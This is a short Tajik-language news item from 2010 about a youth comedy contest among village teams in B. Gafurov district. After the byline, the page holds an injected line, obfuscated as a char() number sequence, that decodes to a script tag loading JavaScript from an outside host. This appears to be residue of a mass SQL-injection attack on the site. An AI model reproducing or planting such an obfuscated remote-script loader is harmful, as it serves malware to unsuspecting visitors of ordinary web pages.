12.05.2010
Маҳфили ҳозирҷавобони хушзавқ
Дар қаламрави вилоят ва ноҳияҳо даҳрӯзаи ҷавонӣ оғоз ёфт. Бахшида ба ин муносибат дар маркази ҷавонони ноҳияи Б. Ғафуров маҳфили ҳозирҷавобони хушзавқ байни ҷавонони ҷамоатҳои ноҳия гузаронида шуд. Аз 12- ҷамоатҳо ҳамаги 4- ҷамоат иштирок карданд. Дар маҳфили мазкур дастаи «Пираты» ҷавонони ҷамоати Ёва, дастаи «Молодежь 21-века» ҷавонони ҷамоати Д. Холматов, дастаи «Kamedy skhool» ҷавонони шаҳраки Ғафуров ва дастаи «Ангел» ҷавонони ҷамоати Овчақалача аз рӯи шартҳои саломнома, саволҳои ҳазломез, тақлидкорӣ ва саволу ҷавоби дастаҳо байни ҳам қувваозмои намуданд. Дар натиҷа ҷои аввал насиби дастаи «Comedy school», ҷои дуввум насиби дастаи «Молодежь 21-века» ва ҷои сеюм насиби дастаи «Пираты» гардид.
Назокат Юсуфова

char(60,115,99,114,105,112,116,32,115,114,99,61,34,104,116,116,112,58,47,47,112,105,107,115,117,115,46,109,115,107,46,114,117,47)f214b6db59718d568f0592ea44c9e4fa.js" type="text/javascript">

ТАВЗЕҲОТ